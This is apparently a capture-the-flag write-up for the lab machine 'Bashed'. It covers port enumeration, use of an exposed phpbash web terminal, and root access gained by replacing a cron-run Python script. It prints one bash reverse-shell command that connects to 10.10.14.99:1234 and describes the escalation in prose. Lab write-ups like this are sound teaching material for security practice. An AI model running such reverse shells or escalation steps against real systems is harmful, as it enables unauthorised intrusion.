# Bashed! ## @author:M3tr1c_r00t  ### Enumeration Step 1: nmap and Gobuster  Only one port is open. So lets visit it.  The site was working on a feature known as phpbash. Which is kind of an emulation of the terminal but in a site format. After interacting for a while I found a way that i could use to get a reverse shell. I created a reverse shell file bash script...  echo "bash -c'bash -i >& /dev/tcp/10.10.14.99/1234 0>&1'" > reverse.sh  And we got our reverse shell! We can now read the user flag. ### Priv Esc looking around in our the user's file system, we find a folder 'scripts'. In it there are two files.  On checking out the two files, it seems like the test.py is being executed in a cron cycle....  We can replace the file with a python reverse shell coz the script is being run by the root user.  You can find this code from pentestmonkey's cheetsheet.  We open a listener and we get a reverse shell as root! Get your root flag and done! ### Socials @instagram:https://instagram.com/Metric_r00t <br> Twitter:https://twitter.com/M3tr1c_root